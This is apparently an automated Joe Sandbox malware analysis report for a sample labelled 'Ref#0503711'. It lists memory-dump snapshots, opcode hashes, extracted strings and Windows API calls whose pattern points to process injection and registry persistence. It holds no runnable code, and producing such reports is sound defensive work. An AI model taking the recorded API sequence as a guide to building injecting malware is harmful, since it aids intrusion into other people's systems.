                                                                • Instruction Fuzzy Hash: 36E1C574A85229CFDBA4CF19C994BDDBBF2EB89304F1080EAD509A7250DB745E85CF44
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6f00cf1e1813037db58031f54f897ce4b560d68d1adc83dac589cc724a89303b
                                                                • Instruction ID: 0b2cd04ab75692fec3951480ea57ae7e2e945c99352ddad6c64363286f35308a
                                                                • Opcode Fuzzy Hash: 6f00cf1e1813037db58031f54f897ce4b560d68d1adc83dac589cc724a89303b
                                                                • Instruction Fuzzy Hash: 98C1E374E56228CFEB94CF68D850BADBBB2FB89300F1081AAD409A7350DB755D84CF51
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4928e7e19a054056884242b749ea872c601719e654ea79226c1db13ec7e5649d
                                                                • Instruction ID: ac4103acf71139ff434fd5e7c6575076cc66439ab3ae0c269c4b1cf4b9c5182c
                                                                • Opcode Fuzzy Hash: 4928e7e19a054056884242b749ea872c601719e654ea79226c1db13ec7e5649d
                                                                • Instruction Fuzzy Hash: 89B103B4D41228CFEB94CFA8D884BADBBF2FB89304F50906AE419AB251D7755885CF40
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b205eb30ea73ea6b8c567731be6816ea9c9598c017b9bcfe2213ab72bdd8f216
                                                                • Instruction ID: 5160e1ade9e723127f6418befd13cf6fb375de2e9c00430a99d9aec4035649f0
                                                                • Opcode Fuzzy Hash: b205eb30ea73ea6b8c567731be6816ea9c9598c017b9bcfe2213ab72bdd8f216
                                                                • Instruction Fuzzy Hash: 86A1F5B0D41228CFEB94CFA9D884BADBBF2FF89304F50916AD419AB251DB755885CF40
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6bed447fa5ca7ef026ec0ae0a0da1df4bcd748e0b454fdc99c9a41f4dcbdd2d5
                                                                • Instruction ID: 7981dfb1b81f0e47a81291116508299b89457ac77d298c8384c0e6cd1a978452
                                                                • Opcode Fuzzy Hash: 6bed447fa5ca7ef026ec0ae0a0da1df4bcd748e0b454fdc99c9a41f4dcbdd2d5
                                                                • Instruction Fuzzy Hash: CE817F32F205158FD715DB69DC84A5EB7F3AFC8711F1A8169E40ADB365DA35EC028B80

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (bq$4'^q$4'^q$4'^q$4'^q$pbq
                                                                • API String ID: 0-723292480
                                                                • Opcode ID: e1ad797627ea26cd6048c9201ce05270f146e54a8e838ee93e710fbcd6507f21
                                                                • Instruction ID: 06ed185b108d7f3bc64ea6a9dbcc1d17711b095978ef1e70db28e2031ba8772a
                                                                • Opcode Fuzzy Hash: e1ad797627ea26cd6048c9201ce05270f146e54a8e838ee93e710fbcd6507f21
                                                                • Instruction Fuzzy Hash: 48D14F32A40119DFCB45CF64C944D99BBB3FF88310B0584E8D609AB276DB32ED56DB90

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$TJcq$TJcq$Te^q
                                                                • API String ID: 0-2400496369
                                                                • Opcode ID: cf96dfb3dc09b405c91fb0baab6b9f0ef04669afb278b35fce4e816ed3b4a385
                                                                • Instruction ID: 126079bdc01e3af10ac359c21a19b9b5dc78635ebc06e0b63dab20b29d0217ba
                                                                • Opcode Fuzzy Hash: cf96dfb3dc09b405c91fb0baab6b9f0ef04669afb278b35fce4e816ed3b4a385
                                                                • Instruction Fuzzy Hash: D5E15A34B142058FD705CFA8D894B6DBBB2FF89710F254469E50A9B3A6CB34EC45CB51

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1725062334.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6210000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: #$2$C$D
                                                                • API String ID: 0-4180688742
                                                                • Opcode ID: f99a39d8b60d81f5618b7ec889506228a91224c58a04b63dad7f39005a74d957
                                                                • Instruction ID: fbaef8a4b51fb5eee14df7ddaa996406c1fb3886e307108d10ea0a205b9125ba
                                                                • Opcode Fuzzy Hash: f99a39d8b60d81f5618b7ec889506228a91224c58a04b63dad7f39005a74d957
                                                                • Instruction Fuzzy Hash: 6021E2B4958268CFEBA0CF14D884BECB7F5AB15304F1094DAC40AAB244CB799EC9CF15

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Hbq$Hbq$Hbq
                                                                • API String ID: 0-2297679979
                                                                • Opcode ID: d2d497615dc149f2d9d48c7b57973b296c981d66d7ece1f7e6dc4f35dd528c91
                                                                • Instruction ID: 18d9e8e5bfb29ba41be233cb6f39488cdc9a46355cbc4f25e9018d6b5d97b0f8
                                                                • Opcode Fuzzy Hash: d2d497615dc149f2d9d48c7b57973b296c981d66d7ece1f7e6dc4f35dd528c91
                                                                • Instruction Fuzzy Hash: 3D127E30A402158FCBA4DFA9C894AAEBBF6FF89301F14852DD5469B350DB75EC46CB90

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (bq$(bq$Hbq
                                                                • API String ID: 0-2835675688
                                                                • Opcode ID: 105d828d7fd6a45a4f551563df14410d9d1a9d1a47ca17cf398a4c06c7fdd083
                                                                • Instruction ID: 2bcdaba9c110d613ba3f2f006c58b9e701a20326d8dfe3612d963fa8a55e33e6
                                                                • Opcode Fuzzy Hash: 105d828d7fd6a45a4f551563df14410d9d1a9d1a47ca17cf398a4c06c7fdd083
                                                                • Instruction Fuzzy Hash: 63E12D34A402199FCB54EFA4D8949DEBBB2FF89301F108569E416AB365DB30EC46CB91

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'^q$4'^q$4'^q
                                                                • API String ID: 0-1196845430
                                                                • Opcode ID: b51e6bf5d178b3dcd682d27a4c3399e733ea8639b8bb5d746d9f23a9d1088d3b
                                                                • Instruction ID: c3993bb23ac9eb54ac9cc017c35bdcfd3084af3c3de25ff804bcf3e07315e0ee
                                                                • Opcode Fuzzy Hash: b51e6bf5d178b3dcd682d27a4c3399e733ea8639b8bb5d746d9f23a9d1088d3b
                                                                • Instruction Fuzzy Hash: 11F1E634B50218DFCB48DFA4D998A9DBBB2FF88301F559158E406AB3A5DB35EC42CB50
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1715782634.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5e80000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'^q$4'^q
                                                                • API String ID: 0-2697143702
                                                                • Opcode ID: ff55fb11ff55a7a79b051e16659c7437fd52fa6e864aecaf58a39af751efcef8
                                                                • Instruction ID: a60cbead93e1277523233818bc839473d55b2624399bed5dee2c6ea62eac651c
                                                                • Opcode Fuzzy Hash: ff55fb11ff55a7a79b051e16659c7437fd52fa6e864aecaf58a39af751efcef8
                                                                • Instruction Fuzzy Hash: C6420434E44219CFDB18EB94C888AFEBBB6FB48305F10A059E99A6B354D7345886CF50

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1715782634.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5e80000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'^q$4'^q
                                                                • API String ID: 0-2697143702
                                                                • Opcode ID: bcb0d1f838cc4e5070f024d0bda6cfa9d29e60b511c2002ce5be5f785766977b
                                                                • Instruction ID: da98510f8c5d5519dbca79e4136d1d1545ac723d5443cc47693aea9d3e3f584c
                                                                • Opcode Fuzzy Hash: bcb0d1f838cc4e5070f024d0bda6cfa9d29e60b511c2002ce5be5f785766977b
                                                                • Instruction Fuzzy Hash: E9F1D334D45218DFCB58EFA4E4946ACBBB7FF49316F205469E45AAB350DB346982CF00

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (bq$d
                                                                • API String ID: 0-3334038649
                                                                • Opcode ID: 7a5dac255a59b8475ec05928c78de8629d7ea88a9c440ba70f1b481ed2ae5ddf
                                                                • Instruction ID: e3ab693bcf5e548e65c0e2306b641db925d84b665a2c00410d5350c65a8cf874
                                                                • Opcode Fuzzy Hash: 7a5dac255a59b8475ec05928c78de8629d7ea88a9c440ba70f1b481ed2ae5ddf
                                                                • Instruction Fuzzy Hash: 9BD15C307406068FCB55CF29C4809AABBF6FF89310B55C96AE45A9B365DB30FC46CB90

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1715782634.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5e80000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'^q$4'^q
                                                                • API String ID: 0-2697143702
                                                                • Opcode ID: 2e798da1e358d0f1d5d729e179a3ffae11cd5fc09d7a32fb42ad793cb22ba335
                                                                • Instruction ID: e9f5205332d37e913f0d2cbff61e2f0fd7c40942650ad9734288815c27d79e4e
                                                                • Opcode Fuzzy Hash: 2e798da1e358d0f1d5d729e179a3ffae11cd5fc09d7a32fb42ad793cb22ba335
                                                                • Instruction Fuzzy Hash: F8C12238E40219CFDB08EFA5D4446FDBBB6FB88306F109469E65A6B350CB359886CF50
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (bq$(bq
                                                                • API String ID: 0-4224401849
                                                                • Opcode ID: a1fc99ea0716a934c4407ca4f621105d704d20b3b1f2bbffa8d88486bb3ff2e6
                                                                • Instruction ID: 092c964be19b6674deb8491c9dae750368b10e93e51394ce8e6c0d96c591f6d3
                                                                • Opcode Fuzzy Hash: a1fc99ea0716a934c4407ca4f621105d704d20b3b1f2bbffa8d88486bb3ff2e6
                                                                • Instruction Fuzzy Hash: 8951CA317442459FCB59DF29D890AAE7BA6EFC4341F208169E906CB3A1CF35DC46CBA1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (bq$Hbq
                                                                • API String ID: 0-4081012451
                                                                • Opcode ID: 573980a5977209e62292330d1cf19e8dea3f6c296d5ddbceabcff0faab77501d
                                                                • Instruction ID: 53b4b23879de18a9496322f345a7ab3400a996395bbd9b4e512fcf2766278294
                                                                • Opcode Fuzzy Hash: 573980a5977209e62292330d1cf19e8dea3f6c296d5ddbceabcff0faab77501d
                                                                • Instruction Fuzzy Hash: F2517930B402558FCB59AF38C89456EBBB7EFD5241B2485ACD5068B3A1CF35EC06CBA5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (bq$Hbq
                                                                • API String ID: 0-4081012451
                                                                • Opcode ID: 0b6b5ebfd42980a2636b836249cfe9e64beaeb4854e4fe2aaee7e53cea6cfa9b
                                                                • Instruction ID: e754272bd9a0a2298e8d561ef512e6ea3dd53849e02fa487be69ccfff03197ec
                                                                • Opcode Fuzzy Hash: 0b6b5ebfd42980a2636b836249cfe9e64beaeb4854e4fe2aaee7e53cea6cfa9b
                                                                • Instruction Fuzzy Hash: 1B51DF306447418FD765DF3AC4A028ABBF6EF85310F14CA6ED0868B7A1DB74E945CB91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'^q$pbq
                                                                • API String ID: 0-3872760177
                                                                • Opcode ID: da8896bd68193d4957850c4bd5c909764a83399e88b6b2b5f2f519f152d959f8
                                                                • Instruction ID: 6260bb5c9c27dce9f06d43db2f977e6ef29bc6be1452b66e27042d77e8eb937f
                                                                • Opcode Fuzzy Hash: da8896bd68193d4957850c4bd5c909764a83399e88b6b2b5f2f519f152d959f8
                                                                • Instruction Fuzzy Hash: 1341EF31A802458FC744DB68C9807AEBBF6FF84300F108929C4499B369DB71A94ACBA1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Te^q$lqq
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (bq$Hbq
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $&
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1725062334.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6210000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: #$+
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1725062334.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6210000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: #$C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1725062334.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6210000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: #$+
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ,bq
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (_^q
                                                                APIs
                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 060E171F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: CreateProcess
                                                                • String ID:
                                                                APIs
                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 060E171F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: CreateProcess
                                                                • String ID:
                                                                APIs
                                                                • CopyFileA.KERNEL32(?,?,?), ref: 060E3E23
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: CopyFile
                                                                • String ID:
                                                                APIs
                                                                • CopyFileA.KERNEL32(?,?,?), ref: 060E3E23
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: CopyFile
                                                                • String ID:
                                                                APIs
                                                                • RegSetValueExA.KERNELBASE(?,?,?,?,?,?), ref: 060E42E8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: Value
                                                                • String ID:
                                                                APIs
                                                                • RegSetValueExA.KERNELBASE(?,?,?,?,?,?), ref: 060E42E8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: Value
                                                                • String ID:
                                                                APIs
                                                                • RegOpenKeyExA.KERNELBASE(?,?,?,?,?), ref: 060E4078
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: Open
                                                                • String ID:
                                                                APIs
                                                                • RegOpenKeyExA.KERNELBASE(?,?,?,?,?), ref: 060E4078
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: Open
                                                                • String ID:
                                                                APIs
                                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 060E2003
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID:
                                                                APIs
                                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 060E2003
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID:
                                                                APIs
                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 060E1E7A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                APIs
                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 060E24C4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID:
                                                                APIs
                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 060E1E7A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                APIs
                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 060E24C4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID:
                                                                • API String ID: 544645111-0
                                                                • Opcode ID: 4cebd423f16b5f6d51bc3cfb0ac07d8f8eb1fdd2152b204b9bad322b22cac439
                                                                • Instruction ID: 27adba408e25d295d52903833eeb041720e757350ab9eda4b52c8c5e09b1a1f4
                                                                • Opcode Fuzzy Hash: 4cebd423f16b5f6d51bc3cfb0ac07d8f8eb1fdd2152b204b9bad322b22cac439
                                                                • Instruction Fuzzy Hash: 0731AAB5D01258DFCF10CFA9D984AEEFBB5BB49310F14942AE814B7210D735A985CF54
                                                                APIs
                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 060CD89C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723348881.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60c0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID:
                                                                • API String ID: 544645111-0
                                                                • Opcode ID: 6c5b7f5e7fc119d0543b37c28994ab9b7bc6aa281d949a3a54696aacb32625f2
                                                                • Instruction ID: 696ae0f5365a85cd021ce3f904ea87e0db927d9ad0862c7277d5c3dde6613a5d
                                                                • Opcode Fuzzy Hash: 6c5b7f5e7fc119d0543b37c28994ab9b7bc6aa281d949a3a54696aacb32625f2
                                                                • Instruction Fuzzy Hash: D13198B8D012589FCB10CFA9D984ADEFBB1BF49320F10942AE814B7250D775A945CF54
                                                                APIs
                                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 060E191F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: ContextThreadWow64
                                                                • String ID:
                                                                • API String ID: 983334009-0
                                                                • Opcode ID: c6253f25175d27a9e0de8c4229f3ee2c5880f324c01e44abf7c43a920b80c099
                                                                • Instruction ID: 3781e5ac4317ba3af24df383d187cb929ecbbbc621c022beeebe18f9ea68cc1b
                                                                • Opcode Fuzzy Hash: c6253f25175d27a9e0de8c4229f3ee2c5880f324c01e44abf7c43a920b80c099
                                                                • Instruction Fuzzy Hash: DE41CAB4D002589FCB50CFA9D984AEEBFF1BB49310F24802AE419B7250C738A985CF94
                                                                APIs
                                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 060E191F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: ContextThreadWow64
                                                                • String ID:
                                                                • API String ID: 983334009-0
                                                                • Opcode ID: 034cb07a80d8dda180b83f72046336b906a0229eec116babb540b7f6b34f7724
                                                                • Instruction ID: 370dc920d4a9088a62c03769842ea780aa335280bc7cc13c11453f14d908d369
                                                                • Opcode Fuzzy Hash: 034cb07a80d8dda180b83f72046336b906a0229eec116babb540b7f6b34f7724
                                                                • Instruction Fuzzy Hash: C431BAB4D012589FCB50CFA9D984AEEFFF0BB49310F24802AE458B7250C738A985CF94
                                                                APIs
                                                                • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 060CEA5F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723348881.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60c0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: ea4c9adf286b81a3bea67677798d37296a6b6697deab2d744b968fc0dd91b2b4
                                                                • Instruction ID: a88f00d28e1783b9a2dde937be201756726aae41dbb8d4af50d394f3c9aa1764
                                                                • Opcode Fuzzy Hash: ea4c9adf286b81a3bea67677798d37296a6b6697deab2d744b968fc0dd91b2b4
